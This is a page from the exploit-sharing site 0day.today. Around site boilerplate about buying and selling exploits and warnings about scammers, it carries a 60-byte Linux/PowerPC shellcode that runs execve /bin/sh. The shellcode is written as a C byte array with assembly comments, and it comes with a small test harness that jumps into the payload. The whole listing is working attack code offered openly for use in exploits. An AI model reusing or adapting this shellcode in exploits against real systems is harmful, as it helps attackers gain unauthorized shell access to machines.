0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/ppc execve /bin/sh 60 bytes
================================= linux/ppc execve /bin/sh 60 bytes ================================= /* execve-core.c by Charles Stevenson <core@bokeoa.com> */ char hellcode[] = /* execve /bin/sh linux/ppc by core */ // Sometimes you can comment out the next line if space is needed "\x7c\x3f\x0b\x78" /*mr r31,r1*/ "\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ "\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/ "\x7f\x08\x02\xa6" /*mflr r24*/ "\x3b\x18\x01\x34" /*addi r24,r24,308*/ "\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ "\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ "\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ "\x38\x81\xff\xf8" /*addi r4,r1,-8*/ "\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ "\x3b\xc0\x01\x60" /*li r30,352*/ "\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ "\x44\xde\xad\xf2" /*.long 0x44deadf2*/ "/bin/shZ"; // the last byte becomes NULL int main(void) { void (*shell)() = (void *)&hellcode; printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n", strlen(hellcode)); shell(); return 0; } # 0day.today [2024-11-17] #